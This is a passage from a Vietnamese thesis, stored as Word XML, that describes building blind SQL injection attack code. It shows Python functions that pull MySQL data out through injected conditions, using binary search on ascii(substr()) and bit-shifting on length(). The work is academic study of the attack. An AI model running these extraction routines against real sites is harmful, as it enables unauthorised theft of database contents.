              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imid </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>(imin + imax)/2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>if(self.checkQuery(" and {0}&lt;=ascii(substr({1},{2},1))".format(imid,query, (i+1))) == True):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t># &lt; key</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imin </w:t>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r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">temp </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>imid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imax </w:t>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r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>if(imax == 0):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>self.logger.info("Character not found!")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>exit()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>self.logger.info("Found character number {0} is: {1}".format(i+1, chr(temp)))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>+=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>chr(temp)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B4DE2" w:rsidRPr="009B4DE2" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t># Second get result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006A00C0" w:rsidRDefault="006A00C0" w:rsidP="00416450">
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="006A00C0">
        <w:t>getMySQLLength</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">() tương tự hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F18">
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(), tuy nhiên cấu trúc được thay đổi để lấy độ dài chuỗi trả về. Về thuật toán giống như hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F18">
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r>
        <w:t>().</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A00C0" w:rsidRPr="00F96CE5" w:rsidTr="00F96CE5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9450" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:t>def getMySQLLength(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imin </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imax </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>self.maxLength</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">temp </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>-1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>while(imin &lt;= imax):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imid </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>(imin + imax)/2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>if(self.checkQuery(" and {0}&lt;=length({1})".format(imid,query)) == True):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t># &lt; key</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imin </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>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t xml:space="preserve">temp </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>imid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>els</w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:lastRenderedPageBreak/>
              <w:t>e:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">imax </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>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t>if(imin == imax):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>imid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>return imin</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>if(imax == 0):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>return None</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A3400" w:rsidRPr="006A3400" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>temp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006A00C0" w:rsidRPr="00F96CE5" w:rsidRDefault="006A3400" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A3400">
              <w:tab/>
              <w:t>return temp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005A6327" w:rsidRDefault="005A6327" w:rsidP="005A6327">
      <w:r>
        <w:t xml:space="preserve">Hàm runner thực hiện chạy câu lệnh SQL, gọi đến hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00731E3A">
        <w:t>runMySQLQuery</w:t>
      </w:r>
      <w:r>
        <w:t>(), từ đây sẽ lần lượt thực hiện lấy độ dài kết quả, rồi lấy từng ký tự.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942DF4" w:rsidRDefault="00942DF4" w:rsidP="00416450">
      <w:r>
        <w:t>Hàm __init__ thực hiện khởi tạo các thành phần liên quan, cần sử dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942DF4" w:rsidRDefault="00942DF4" w:rsidP="00416450">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">hi tiết về toàn bộ mã tấn công của phương pháp tìm kiếm nhị phân tham khảo </w:t>
      </w:r>
      <w:r w:rsidR="00D655B3">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>mục 2 P</w:t>
      </w:r>
      <w:r>
        <w:t>hụ lục</w:t>
      </w:r>
      <w:r w:rsidR="00610D75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A14DE">
        <w:t>của luận văn</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00650956" w:rsidRDefault="00650956" w:rsidP="00FF35AF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="_Toc459374358"/>
      <w:r>
        <w:t>Xây dựng mã tấn công sử dụng phương pháp dịch bit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="148"/>
    </w:p>
    <w:p w:rsidR="003B78B9" w:rsidRDefault="003B78B9" w:rsidP="003B78B9">
      <w:r>
        <w:t>Tương tự như phương pháp tìm kiếm nhị phân, để xây dựng mã tấn công dạng tìm kiếm nhị phân, luận văn sẽ xây dựng các hàm sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B78B9" w:rsidRDefault="002E332A" w:rsidP="003B78B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hàm checkQuery(): Tương tự như phương pháp tìm kiếm nhị phân.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B78B9" w:rsidRDefault="003B78B9" w:rsidP="003B78B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="00835F18">
        <w:t>getMySQLQueryResult</w:t>
      </w:r>
      <w:r>
        <w:t>().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B78B9" w:rsidRDefault="003B78B9" w:rsidP="003B78B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="006A00C0">
        <w:t>getMySQLLength</w:t>
      </w:r>
      <w:r>
        <w:t>().</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B78B9" w:rsidRDefault="003B78B9" w:rsidP="003B78B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Các hàm mặc định tuân thủ theo chuẩn của </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5176">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WETK: Hàm run() và hàm __init()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00922FC1" w:rsidRDefault="002E332A" w:rsidP="00922FC1">
      <w:r>
        <w:t xml:space="preserve">Hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="006A00C0">
        <w:t>getMySQLLength</w:t>
      </w:r>
      <w:r>
        <w:t>() để xác định độ dài chuỗi, tuy nhiên sử dụng phương phát dịch bit. Giá trị sau khi lấy sẽ lần lượt đượ</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>c dịch từ 6 bit đến 0 bit (để lấy từ bit thứ 7 đến bi</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 0), đêm chia lấy phần dư với 2 rồi so sánh với 1. Nếu là đúng thì bit đó là 1, còn lại là 2. Mỗi khi lấy được 1 bit, sẽ cộng dồn vào giá trị tmp. Giá trị cộng thêm đó là số mũ của 2, với số số mũ chính là giá trị của bit. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9180"/>
      </w:tblGrid>
      <w:tr w:rsidR="00555378" w:rsidRPr="00536EBF" w:rsidTr="00555378">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9450" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:t>def getMySQLLength(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t xml:space="preserve">tmp </w:t>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>for i in reversed(range(0, 7)):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00536EBF" w:rsidRPr="00536EBF" w:rsidRDefault="00536EBF" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00536EBF">
              <w:tab/>
              <w:t>if(self.checkQuery("and (((length({0})&gt;&gt;{1}) mod 2)=1)".format(query, i))):</w:t>
            </w:r>
          </w:p>
